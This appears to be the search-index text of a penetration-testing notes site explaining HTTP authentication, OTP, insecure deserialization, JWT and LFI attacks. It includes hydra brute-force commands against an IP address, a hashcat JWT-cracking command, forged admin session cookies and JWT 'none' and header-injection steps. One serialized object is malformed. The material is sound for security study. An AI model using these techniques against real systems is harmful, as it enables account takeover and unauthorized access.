                                        • Challenge Header: In the response, the server includes a WWW-Authenticate header with the value \"Basic.\" This header tells the client that it needs to provide credentials to access the resource.
                                        • Credential Format: The client constructs a string in the format username:password and encodes it in Base64. It then includes this encoded string in an Authorization header in subsequent requests. The header looks like this:

• Authorization: Basic <Base64-encoded credentials> (see the sketch after this list)
                                          • Server Validation: When the server receives the request with the Authorization header, it decodes the Base64-encoded credentials, checks them against its database of authorized users, and grants access if the credentials are valid.

                                          • Access Granted or Denied: If the credentials are valid, the server allows access to the requested resource by responding with the resource content and a 200 OK status code. If the credentials are invalid or missing, it continues to respond with 401 Unauthorized.
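A minimal sketch of the credential format and server validation steps, assuming admin:password as credentials and a hypothetical /protected/ path:

```bash
# Build the Base64 credential string by hand...
CRED=$(echo -n 'admin:password' | base64)    # YWRtaW46cGFzc3dvcmQ=
curl -s -H "Authorization: Basic $CRED" "http://$ip/protected/"
# ...or let curl construct the header for you
curl -s -u admin:password "http://$ip/protected/"
```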
                                          • ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#how-to-attack-it","title":"How to attack it","text":"

You can perform dictionary attacks with Burp Suite by Base64-encoding the payloads. You can also use hydra, as shown below.
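For example, a hydra dictionary attack against a Basic-auth-protected path (the wordlist path and /protected/ are assumptions):

```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt http-get://$ip/protected/
```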

                                            ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#digest-http-authentication","title":"Digest HTTP Authentication","text":"

                                            HTTP Digest Authentication is an authentication mechanism used in web applications and services to securely verify the identity of users or clients trying to access protected resources. It addresses some of the security limitations of Basic Authentication by employing a challenge-response mechanism and hashing to protect user credentials during transmission. However, like Basic Authentication, it's important to use HTTPS to ensure the security of the communication.

                                            • Client Request: When a client (usually a web browser) makes a request to a protected resource on a server, the server responds with a 401 Unauthorized status code if authentication is required.
                                            • Challenge Header: In the response, the server includes a WWW-Authenticate header with the value \"Digest.\" This header provides information needed by the client to construct a secure authentication request. Example of a WWW-Authenticate header:
                                            WWW-Authenticate: Digest realm=\"Example\", qop=\"auth\", nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\", opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"\n\n# Where:\n# - **realm**: A descriptive string indicating the protection space (usually the name of the application or service).\n# - **qop (Quality of Protection)**: Specifies the quality of protection. Commonly set to \"auth.\"\n# - **nonce**: A unique string generated by the server for each request to prevent replay attacks.\n# - **opaque**: An opaque value set by the server, which the client must return unchanged in the response.\n
                                            • Client Response: The client constructs a response using the following components: Username, Realm, Password, Nonce, Request URI (the path to the protected resource), HTTP method (e.g., GET, POST), cnonce (a client-generated nonce), qop (the quality of protection), H(A1) and H(A2), which are hashed values derived from the components. It then calculates a response hash (response) based on these components and includes it in an Authorization header. Example Authorization header:
                                            Authorization: Digest username=\"user\", realm=\"Example\", nonce=\"dcd98b7102dd2f0e8b11d0f600bfb0c093\", uri=\"/resource\", qop=auth, nc=00000001, cnonce=\"0a4f113b\", response=\"6629fae49393a05397450978507c4ef1\", opaque=\"5ccc069c403ebaf9f0171e9517f40e41\"\n
                                            • Server Validation: The server receives the request with the Authorization header and validates the response hash calculated by the client. It does this by reconstructing the same components and calculating its own response hash. If the hashes match, the server considers the client authenticated and grants access to the requested resource.
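The server-side computation from the Server Validation step can be reproduced in the shell. A sketch using the example values above with qop=auth; 'password' is a stand-in, so the output only matches the response field when the real password is used:

```bash
# HA1 = MD5(username:realm:password), HA2 = MD5(method:uri)
HA1=$(echo -n 'user:Example:password' | md5sum | cut -d' ' -f1)
HA2=$(echo -n 'GET:/resource' | md5sum | cut -d' ' -f1)
NONCE='dcd98b7102dd2f0e8b11d0f600bfb0c093'
# response = MD5(HA1:nonce:nc:cnonce:qop:HA2)
echo -n "$HA1:$NONCE:00000001:0a4f113b:auth:$HA2" | md5sum | cut -d' ' -f1
```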
                                            ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#how-to-attack-it_1","title":"How to attack it","text":"

                                            We can use hydra.

                                            hydra -l admin -P /root/Desktop/wordlists/100-common-passwords.txt http-get://192.155.195.3/digest/\n\nhydra 192.155.195.3 -l admin -P /root/Desktop/wordlists/100-common-passwords.txt http-get /digest/\n
                                            ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#multifactor-authentication","title":"Multifactor Authentication","text":"","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#otp","title":"OTP","text":"

                                            OTP (One-Time Password) security is a two-factor authentication (2FA) method used to enhance the security of user accounts and systems. OTPs are temporary, single-use codes that are typically generated and sent to the user's registered device (such as a mobile phone) to verify their identity during login or transaction processes. The primary advantage of OTPs is that they are time-sensitive and expire quickly, making them difficult for attackers to reuse.

For brute-forcing OTPs, OWASP ZAP is recommended since it does not introduce delays or throttling.
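ffuf also brute-forces a short OTP quickly; a sketch assuming a hypothetical /verify endpoint, an otp POST parameter, and a 401 response on failure:

```bash
# 10,000 zero-padded candidates for a 4-digit OTP; filter out failed attempts
ffuf -w <(seq -w 0000 9999) -u "http://$ip/verify" -X POST \
     -d 'otp=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fc 401
```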

                                            ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#types-of-otps","title":"Types of OTPs","text":"
                                            • Time-Based OTPs (TOTP): TOTP is a widely used OTP method that generates codes based on a shared secret key and the current time. These codes are typically valid for a short duration, often 30 seconds.
                                            • SMS-Based OTPs: OTPs can be sent to users via SMS messages. When users log in, they receive an OTP on their mobile phone, which they must enter to verify their identity.
                                            • Rate Limiting and Lockout: Implement rate limiting and account lockout mechanisms to prevent brute force attacks on OTPs. Lockout accounts after a certain number of failed OTP attempts. OTP rate limiting is a security mechanism used to prevent brute force attacks or abuse of one-time password (OTP) systems, such as those used in two-factor authentication (2FA). Rate limiting restricts the number of OTP verification attempts that can be made within a specified time period. By enforcing rate limits, organizations can reduce the risk of attackers guessing or trying out multiple OTPs in quick succession.
                                            ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/insecure-deserialization/","title":"Insecure deserialization","text":"

                                            Insecure deserialization is when user-controllable data is deserialized by a website. This potentially enables an attacker to manipulate serialized objects in order to pass harmful data into the application code.

                                            Sources for these notes
                                            • Portswigger: Insecure deserialization.
                                            • Hacktricks: Deserialization.
                                            • OWASP deserialization Cheat sheet.
                                            Tools
                                            • Java: ysoserial
                                            • PHP: phpggc.
                                            • Burpsuite Extensions: Java Deserialization Scanner, PHP Object Injection Slinger, PHP Object Injection Check
                                            • Exploits: Ruby 2.X generic deserialization to RCE gadget chain
                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#what-is-deserialization","title":"What is deserialization","text":"
                                            • Serialization\u00a0is the process of converting complex data structures, such as objects and their fields, into a \"flatter\" format that can be sent and received as a sequential stream of bytes.

                                            • Deserialization\u00a0is the process of restoring this byte stream to a fully functional replica of the original object, in the exact state as when it was serialized.

                                            Exactly how objects are serialized depends on the language. Some languages serialize objects into binary formats, whereas others use different string formats, with varying degrees of human readability. \u00a0

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#identifying","title":"Identifying","text":"","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#php","title":"PHP","text":"

                                            PHP uses a mostly human-readable string format, with letters representing the data type and numbers representing the length of each entry.

                                            For example, consider a\u00a0User\u00a0object with the attributes:

                                            $user->name = \"carlos\"; $user->isLoggedIn = true;

                                            When serialized, this object may look something like this:

                                            O:4:\"User\":2:{s:4:\"name\":s:6:\"carlos\"; s:10:\"isLoggedIn\":b:1;}

                                            - `O:4:\"User\"`\u00a0- An object with the 4-character class name\u00a0`\"User\"`\n- `2`\u00a0- the object has 2 attributes\n- `s:4:\"name\"`\u00a0- The key of the first attribute is the 4-character string\u00a0`\"name\"`\n- `s:6:\"carlos\"`\u00a0- The value of the first attribute is the 6-character string\u00a0`\"carlos\"`\n- `s:10:\"isLoggedIn\"`\u00a0- The key of the second attribute is the 10-character string\u00a0`\"isLoggedIn\"`\n- `b:1`\u00a0- The value of the second attribute is the boolean value\u00a0`true`\n

                                            The native methods for PHP serialization are\u00a0serialize()\u00a0and\u00a0unserialize(). If you have source code access, you should start by looking for\u00a0unserialize()\u00a0anywhere in the code and investigating further.
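The example object can be reproduced from the command line, assuming the PHP CLI is installed:

```bash
# Serialize the example User object and print the flat string
php -r 'class User { public $name = "carlos"; public $isLoggedIn = true; } echo serialize(new User()), PHP_EOL;'
# O:4:"User":2:{s:4:"name";s:6:"carlos";s:10:"isLoggedIn";b:1;}
```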

                                            In PHP, specific magic methods are utilized during the serialization and deserialization processes:

                                            • __sleep: Invoked when an object is being serialized. This method should return an array of the names of all properties of the object that should be serialized. It's commonly used to commit pending data or perform similar cleanup tasks.

                                            • __wakeup: Called when an object is being deserialized. It's used to reestablish any database connections that may have been lost during serialization and perform other reinitialization tasks.

                                            • __unserialize: This method is called instead of __wakeup (if it exists) when an object is being deserialized. It gives more control over the deserialization process compared to __wakeup.

                                            • __destruct: This method is called when an object is about to be destroyed or when the script ends. It's typically used for cleanup tasks, like closing file handles or database connections.

                                            • __toString: This method allows an object to be treated as a string. It can be used for reading a file or other tasks based on the function calls within it, effectively providing a textual representation of the object.

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#java","title":"Java","text":"

                                            Some languages, such as Java, use binary serialization formats.

                                            To distinguish it: serialized Java objects always begin with the same bytes, which are encoded as\u00a0ac ed\u00a0in hexadecimal and\u00a0rO0\u00a0in Base64.
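Those magic bytes are easy to confirm in the shell; rO0ABQ== is simply the 4-byte preamble in Base64:

```bash
# The Base64 prefix rO0 decodes to the Java serialization magic ac ed 00 05
echo -n 'rO0ABQ==' | base64 -d | xxd
# 00000000: aced 0005                                ....
```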

                                            Any class that implements the interface\u00a0java.io.Serializable\u00a0can be serialized and deserialized.

                                            If you have source code access, take note of any code that uses the\u00a0readObject()\u00a0method, which is used to read and deserialize data from an\u00a0InputStream.

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#attacks","title":"Attacks","text":"","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#1-manipulate-serialized-objects","title":"1. Manipulate serialized objects","text":"

                                            If you have source code access, take note of any code that uses the\u00a0readObject()\u00a0method, which is used to read and deserialize data from an\u00a0InputStream.

                                            As a simple example, consider a website that uses a serialized\u00a0User\u00a0object to store data about a user's session in a cookie. If an attacker spotted this serialized object in an HTTP request, they might decode it to find the following byte stream:

                                            O:4:\"User\":2:{s:8:\"username\";s:6:\"carlos\";s:7:\"isAdmin\";b:0;}

                                            The\u00a0isAdmin\u00a0attribute is an obvious point of interest. An attacker could simply change the boolean value of the attribute to\u00a01\u00a0(true), re-encode the object, and overwrite their current cookie with this modified value. In isolation, this has no effect. However, let's say the website uses this cookie to check whether the current user has access to certain administrative functionality:

$user = unserialize($_COOKIE['session']);\nif ($user->isAdmin === true)\n{\n    // allow access to admin interface\n}\n

                                            This vulnerable code would instantiate a\u00a0User\u00a0object based on the data from the cookie, including the attacker-modified\u00a0isAdmin\u00a0attribute. At no point is the authenticity of the serialized object checked. This data is then passed into the conditional statement and, in this case, would allow for an easy privilege escalation.

                                            Burpsuite lab

                                            Burpsuite Lab: Modifying serialized objects

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#2-modify-data-types","title":"2. Modify data types","text":"

                                            PHP-based logic is particularly vulnerable to this kind of manipulation due to the behavior of its loose comparison operator (==) when comparing different data types.

                                            Reference: PHP type juggling

                                            Additionally, if we spot a session cookie base64-encoded with an object, such as this PHP one, we can try to modify it.

                                            Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJieno5ZmJ2OHV6YXM3MTRlcnJuaGExcTVwcGJ6eWY1aCI7fQ%3d%3d\n

                                            Decoded from base64

                                            O:4:\"User\":2:{s:8:\"username\";s:6:\"wiener\";s:12:\"access_token\";s:32:\"bzz9fbv8uzas714errnha1q5ppbzyf5h\";}\n

s refers to a string and i to an integer. We can modify both the value and the data type by changing the object to:

                                            O:4:\"User\":2:{s:8:\"username\";s:13:\"administrator\";s:12:\"access_token\";i:0:\"\";}\n

Afterwards, Base64-encode the object and insert it as the session cookie:

Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjEzOiJhZG1pbmlzdHJhdG9yIjtzOjEyOiJhY2Nlc3NfdG9rZW4iO2k6MDt9\n

Explanation: Let's say an attacker modified an attribute (here, access_token) so that it contains the integer 0 instead of the expected string. As long as the stored string does not start with a number, PHP's loose comparison (==) would always return true, enabling an authentication bypass. Note that this is only possible because deserialization preserves the data type. If the code fetched the value from the request directly, the 0 would be converted to a string and the condition would evaluate to false.
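The same round trip can be scripted; a sketch using the original cookie from above and the tampered object:

```bash
# Decode the original cookie (%3d%3d is URL-encoded '==')
echo 'Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJieno5ZmJ2OHV6YXM3MTRlcnJuaGExcTVwcGJ6eWY1aCI7fQ==' | base64 -d
# Re-encode the tampered object for the new session cookie
echo -n 'O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}' | base64 -w0
```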

                                            Burpsuite lab

                                            Burpsuite Lab: Modifying serialized data types

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#3-abuse-application-functionality","title":"3. Abuse application functionality","text":"

                                            A website's functionality might also perform dangerous operations on data from a deserialized object. In this case, you can use insecure deserialization to pass in unexpected data and leverage the related functionality to do damage.

                                            For example, as part of a website's \"Delete user\" functionality, the user's profile picture is deleted by accessing the file path in the\u00a0$user->image_location\u00a0attribute. If this\u00a0$user\u00a0was created from a serialized object, an attacker could exploit this by passing in a modified object with the\u00a0image_location\u00a0set to an arbitrary file path.

                                            Burpsuite lab

                                            Burpsuite Lab: Using application functionality to exploit insecure deserialization

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#4-magic-methods","title":"4. Magic methods","text":"

                                            Magic methods are a special subset of methods that are invoked automatically whenever a particular event or scenario occurs. \u00a0One of the most common examples in PHP is\u00a0__construct(), which is invoked whenever an object of the class is instantiated, similar to Python's\u00a0__init__. Typically, constructor magic methods like this contain code to initialize the attributes of the instance. However, magic methods can be customized by developers to execute any code they want.

                                            PHP -> Most importantly in this context, some languages have magic methods that are invoked automatically\u00a0during\u00a0the deserialization process. For example, PHP's\u00a0unserialize()\u00a0method looks for and invokes an object's\u00a0__wakeup()\u00a0magic method.

                                            JAVA -> In Java deserialization, the same applies to the\u00a0ObjectInputStream.readObject()\u00a0method, which is used to read data from the initial byte stream and essentially acts like a constructor for \"re-initializing\" a serialized object. However,\u00a0Serializable\u00a0classes can also declare their own\u00a0readObject()\u00a0method as follows:

                                            private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException \n{ \n    // implementation \n}\n

                                            A\u00a0readObject()\u00a0method declared in exactly this way acts as a magic method that is invoked during deserialization. This allows the class to control the deserialization of its own fields more closely.

                                            You should pay close attention to any classes that contain these types of magic methods. They allow you to pass data from a serialized object into the website's code before the object is fully deserialized. This is the starting point for creating more advanced exploits.

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#5-inject-arbitrary-objects","title":"5. Inject arbitrary objects","text":"

                                            The methods available to an object are determined by its class. Deserialization methods do not typically check what they are deserializing. This means that you can pass in objects of any serializable class that is available to the website, and the object will be deserialized.

                                            The fact that this object is not of the expected class does not matter. The unexpected object type might cause an exception in the application logic, but the malicious object will already be instantiated by then.

                                            Burpsuite lab

                                            Burpsuite Lab: Arbitrary object injection in PHP

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#6-gadget-chains","title":"6. Gadget chains","text":"

                                            Classes containing these deserialization magic methods can also be used to initiate more complex attacks involving a long series of method invocations, known as a \"gadget chain\".

                                            A \"gadget\" is a snippet of code that exists in the application that can help an attacker to achieve a particular goal. An individual gadget may not directly do anything harmful with user input. However, the attacker's goal might simply be to invoke a method that will pass their input into another gadget. By chaining multiple gadgets together in this way, an attacker can potentially pass their input into a dangerous \"sink gadget\", where it can cause maximum damage.

                                            It is important to note that the vulnerability is the deserialization of user-controllable data, not the mere presence of a gadget chain in the website's code or any of its libraries.

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#prebuilt-gadget-chains","title":"Prebuilt gadget chains","text":"

                                            Java: ysoserial

                                            PHP: phpggc

About ysoserial: Not all of the gadget chains in ysoserial enable you to run arbitrary code. Instead, they may be useful for other purposes. For example, you can use the following ones to help you quickly detect insecure deserialization on virtually any server:
• The URLDNS chain triggers a DNS lookup for a supplied URL. Most importantly, it does not rely on the target application using a specific vulnerable library and works in any known Java version. This makes it the most universal gadget chain for detection purposes. If you spot a serialized object in the traffic, you can try using this gadget chain to generate an object that triggers a DNS interaction with the Burp Collaborator server. If it does, you can be sure that deserialization occurred on your target.
• JRMPClient is another universal chain that you can use for initial detection. It causes the server to try establishing a TCP connection to the supplied IP address. Note that you need to provide a raw IP address rather than a hostname. This chain may be useful in environments where all outbound traffic is firewalled, including DNS lookups. You can try generating payloads with two different IP addresses: a local one and a firewalled, external one. If the application responds immediately for a payload with a local address, but hangs for a payload with an external address, causing a delay in the response, this indicates that the gadget chain worked because the server tried to connect to the firewalled address. In this case, the subtle time difference in responses can help you to detect whether deserialization occurs on the server, even in blind cases.
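A sketch of the URLDNS detection workflow (the jar name varies per release, and the Collaborator subdomain is a placeholder):

```bash
# Generate a serialized object that triggers a DNS lookup on deserialization
java -jar ysoserial-all.jar URLDNS 'http://UNIQUE-ID.burpcollaborator.net' > urldns.bin
# Base64-encode the object if the application expects it in a cookie or parameter
base64 -w0 urldns.bin
```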

                                            Burpsuite lab

                                            Burpsuite Lab: Exploiting Java deserialization with Apache Commons

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#documented-gadget-chains","title":"Documented gadget chains","text":"

                                            There may not always be a dedicated tool available for exploiting known gadget chains in the framework used by the target application. In this case, it's always worth looking online to see if there are any documented exploits that you can adapt manually.

                                            Burpsuite lab

                                            Burpsuite Lab: Exploiting Ruby deserialization using a documented gadget chain

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#7-your-own-exploit","title":"7. Your own exploit","text":"","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#8-phar-deserialization","title":"8. PHAR deserialization","text":"

                                            PHP provides several URL-style wrappers that you can use for handling different protocols when accessing file paths. One of these is the\u00a0phar://\u00a0wrapper, which provides a stream interface for accessing PHP Archive (.phar) files.

                                            The PHP documentation reveals that\u00a0PHAR\u00a0manifest files contain serialized metadata. Crucially, if you perform any filesystem operations on a\u00a0phar://\u00a0stream, this metadata is implicitly deserialized.

                                            This means that a\u00a0phar://\u00a0stream can potentially be a vector for exploiting insecure deserialization.

                                            The explanation: This technique requires you to upload the\u00a0PHAR\u00a0to the server somehow. One approach is to use an image upload functionality, for example. If you are able to create a polyglot file, with a\u00a0PHAR\u00a0masquerading as a simple\u00a0JPG, you can sometimes bypass the website's validation checks. If you can then force the website to load this polyglot \"JPG\" from a\u00a0phar://\u00a0stream, any harmful data you inject via the\u00a0PHAR\u00a0metadata will be deserialized. As the file extension is not checked when PHP reads a stream, it does not matter that the file uses an image extension. As long as the class of the object is supported by the website, both the\u00a0__wakeup()\u00a0and\u00a0__destruct()\u00a0magic methods can be invoked in this way, allowing you to potentially kick off a gadget chain using this technique.
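A minimal sketch of the trigger, assuming the polyglot was uploaded to uploads/avatar.jpg and a hypothetical ?page= parameter reaches a filesystem function:

```bash
# Any filesystem operation on the phar:// stream deserializes the PHAR metadata
curl "http://$ip/index.php?page=phar://./uploads/avatar.jpg/ignored.txt"
```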

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/insecure-deserialization/#9-memory-corruption","title":"9. Memory corruption","text":"

Even without the use of gadget chains, it is still possible to exploit insecure deserialization. If all else fails, there are often publicly documented memory corruption vulnerabilities that can be exploited via insecure deserialization. Deserialization methods, such as PHP's unserialize(), are rarely hardened against these kinds of attacks and expose a huge amount of attack surface.

                                            ","tags":["web","pentesting","attack"]},{"location":"webexploitation/jwt-attacks/","title":"Json Web Token attacks","text":"Resources

                                            https://github.com/Crypto-Cat/CTF/tree/main/web/WebSecurityAcademy/jwt

                                            JSON web tokens (JWTs) are a standardized format for sending cryptographically signed JSON data between systems.

                                            The server that issues the token typically generates the signature by hashing the header and payload. In some cases, they also encrypt the resulting hash.

                                            • As the signature is directly derived from the rest of the token, changing a single byte of the header or payload results in a mismatched signature.

                                            • Without knowing the server's secret signing key, it shouldn't be possible to generate the correct signature for a given header or payload.

JSON Web Signature (JWS) - The contents of the token are signed, but not encrypted (only Base64url-encoded).

                                            JSON Web Encryption (JWE) - The contents of the token are encrypted.

                                            ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#jwt-signature-verification-attack","title":"JWT signature verification attack","text":"","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#1-server-not-verifying-the-signature","title":"1. Server not verifying the signature","text":"

                                            If the server doesn't verify the signature properly, there's nothing to stop an attacker from making arbitrary changes to the rest of the token.

                                            For example, consider a JWT containing the following claims:

                                            { \"username\": \"carlos\", \"isAdmin\": false }

                                            If the server identifies the session based on this\u00a0username, modifying its value might enable an attacker to impersonate other logged-in users. Similarly, if the\u00a0isAdmin\u00a0value is used for access control, this could provide a simple vector for privilege escalation.

                                            ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#2-accepting-arbitrary-signatures","title":"2. Accepting arbitrary signatures","text":"

                                            JWT libraries typically provide one method for verifying tokens and another that just decodes them. For example, the Node.js library\u00a0jsonwebtoken\u00a0has\u00a0verify()\u00a0and\u00a0decode().

                                            Occasionally, developers confuse these two methods and only pass incoming tokens to the\u00a0decode()\u00a0method. This effectively means that the application doesn't verify the signature at all.

The payload can then be changed without limitation.

                                            ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#3-accepting-tokens-with-no-signature","title":"3. Accepting tokens with no signature","text":"

                                            Otherwise called the \"none\" attack. JWTs can be signed using a range of different algorithms, but can also be left unsigned. In this case, the\u00a0alg\u00a0parameter is set to\u00a0none, which indicates a so-called \"unsecured JWT\".

                                            \"alg\" parameter can therefore be set to:

                                            none\nNone\nNONE\nNoNE\n

The attacker can then modify the payload.

                                            Finally, the payload part must still be terminated with a trailing dot.
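An unsigned token can be crafted entirely in the shell (the claims are illustrative):

```bash
# Base64url helper: strip padding and swap the URL-unsafe characters
b64url() { base64 -w0 | tr '+/' '-_' | tr -d '='; }
H=$(echo -n '{"alg":"none","typ":"JWT"}' | b64url)
P=$(echo -n '{"username":"administrator","isAdmin":true}' | b64url)
echo "$H.$P."   # the trailing dot marks the empty signature part
```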

                                            ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#4-brute-forcing-secret-keys","title":"4. Brute-forcing secret keys","text":"

                                            When implementing JWT applications, developers sometimes make mistakes like forgetting to change default or placeholder secrets.

                                            jwt secrets payloads

                                            https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list

                                            hashcat -a 0 -m 16500 <jwt> <wordlist>\n

                                            If you run the command more than once, you need to include the\u00a0--show\u00a0flag to output the results.

Once you have identified the secret key, you can use it to generate a valid signature. Use the JWT Editor extension for that (Keys tab), or sign the token from the command line as sketched below.
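HS256 is just an HMAC over header.payload; 'secret1' stands in for whatever key hashcat recovered:

```bash
b64url() { base64 -w0 | tr '+/' '-_' | tr -d '='; }
H=$(echo -n '{"alg":"HS256","typ":"JWT"}' | b64url)
P=$(echo -n '{"username":"administrator"}' | b64url)
# Sign header.payload with the recovered secret and append the signature
SIG=$(echo -n "$H.$P" | openssl dgst -sha256 -hmac 'secret1' -binary | b64url)
echo "$H.$P.$SIG"
```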

Then, send your request to Repeater. In Repeater, go to the JSON Web Token tab, modify the payload, and click Sign. Select your signing key.

                                            ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#5-jwt-header-parameter-injections","title":"5. JWT header parameter injections","text":"

                                            According to the JWS specification, only the\u00a0alg\u00a0header parameter is mandatory. In practice, however, JWT headers (also known as JOSE headers) often contain several other parameters. The following ones are of particular interest to attackers.

                                            • jwk\u00a0(JSON Web Key) - Provides an embedded JSON object representing the key.

                                            • jku\u00a0(JSON Web Key Set URL) - Provides a URL from which servers can fetch a set of keys containing the correct key.

                                            • kid\u00a0(Key ID) - Provides an ID that servers can use to identify the correct key in cases where there are multiple keys to choose from. Depending on the format of the key, this may have a matching\u00a0kid\u00a0parameter.

                                            ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#51-injecting-self-signed-jwts-via-the-jwk-parameter","title":"5.1. Injecting self-signed JWTs via the jwk parameter","text":"

                                            The JSON Web Signature (JWS) specification describes an optional\u00a0jwk\u00a0header parameter, which servers can use to embed their public key directly within the token itself in JWK format.

                                            How to perform the attack with Burpsuite:

                                            1. With the extension loaded, in Burp's main tab bar, go to the JWT Editor Keys tab.\n\n2. Generate a new RSA key.\n\n3. Send a request containing a JWT to Burp Repeater.\n\n4. In the message editor, switch to the extension-generated JSON Web Token tab and modify the token's payload however you like.\n\n5. Click Attack, then select Embedded JWK. When prompted, select your newly generated RSA key.\n\n6. Send the request to test how the server responds.\n
                                            ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#52-injecting-self-signed-jwts-via-the-jku-parameter","title":"5.2. Injecting self-signed JWTs via the jku parameter","text":"

                                            Instead of embedding public keys directly using the\u00a0jwk\u00a0header parameter, some servers let you use the\u00a0jku\u00a0(JWK Set URL) header parameter to reference a JWK Set containing the key. When verifying the signature, the server fetches the relevant key from this URL.

                                            A JWK Set is a JSON object containing an array of JWKs representing different keys. You can see an example of this below.

                                            { \"keys\": [ { \"kty\": \"RSA\", \"e\": \"AQAB\", \"kid\": \"75d0ef47-af89-47a9-9061-7c02a610d5ab\", \"n\": \"o-yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw-fhvsWQ\" }, { \"kty\": \"RSA\", \"e\": \"AQAB\", \"kid\": \"d8fDFo-fS9-faS14a9-ASf99sa-7c1Ad5abA\", \"n\": \"fc3f-yy1wpYmffgXBxhAUJzHql79gNNQ_cb33HocCuJolwDqmk6GPM4Y_qTVX67WhsN3JvaFYw-dfg6DH-asAScw\" } ] }`\n

                                            JWK Sets like this are sometimes exposed publicly via a standard endpoint, such as\u00a0/.well-known/jwks.json.

                                            So a way to trick this validation is by creating our own set of RSA keys.

                                            Then, have a server serving these keys.

                                            Then, modify the payload of the JWT.

And finally, modify the header, adding a kid corresponding to our crafted RSA key and a jku parameter pointing to our server serving the keys. With this configuration we can use JWT Editor in Burp Suite to sign the newly crafted JWT.

                                            ","tags":["web","pentesting","jwt"]},{"location":"webexploitation/jwt-attacks/#53-injecting-self-signed-jwts-via-the-kid-parameter","title":"5.3. Injecting self-signed JWTs via the kid parameter","text":"","tags":["web","pentesting","jwt"]},{"location":"webexploitation/local-file-inclusion-lfi/","title":"LFI attack - Local File Inclusion","text":"OWASP

                                            OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include

| ID | Link to Hackinglife | Link to OWASP | Description |
| --- | --- | --- | --- |
| 5.1 | WSTG-ATHZ-01 | Testing Directory Traversal File Include | Identify injection points that pertain to path traversal. Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion). |

                                            Local File Inclusion (LFI) is a type of security vulnerability that occurs when an application allows an attacker to include files on the server through the web browser. File inclusion in web applications refers to the practice of including external files, often scripts or templates, into a web page dynamically. It is a fundamental concept used to create dynamic and modular web applications.

                                            LFI vulnerabilities typically occur due to poor input validation or lack of proper security mechanisms in web applications. Attackers exploit these vulnerabilities by manipulating input parameters that are used to specify file paths or filenames within the application:

                                            • File Inclusion Functions: Functions like include(), require(), or file_get_contents() that accept user-controlled input for file paths.
                                            • HTTP Parameters: Input fields in web forms or query parameters in URLs.
                                            • Cookies: If an application uses cookies to determine the file to include.
                                            • Session Variables: If session data can be manipulated to control file inclusion.

                                            Impact:

                                            • Information Disclosure: Attackers can read sensitive files, including configuration files, user data, and source code, exposing critical information.
                                            • Remote Code Execution: In some cases, LFI can lead to the execution of arbitrary code if an attacker can include malicious PHP or other script files.
                                            • Directory Traversal: LFI attacks can allow an attacker to navigate the directory structure, potentially leading to further vulnerabilities or unauthorized access.

                                            LFI (Local File Inclusion): The primary objective of an LFI attack is to include and display the contents of a file on the server within the context of a web application (to get it executed).

                                            Directory Traversal: Directory Traversal, also known as Path Traversal, focuses on navigating the file system's directory structure to access files or directories outside the intended path. While this can lead to LFI, the primary goal is often broader, encompassing the ability to read, modify, or delete files and directories.

                                            ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/local-file-inclusion-lfi/#interesting-files","title":"Interesting files","text":"

• Interesting Windows files
• Interesting Linux files

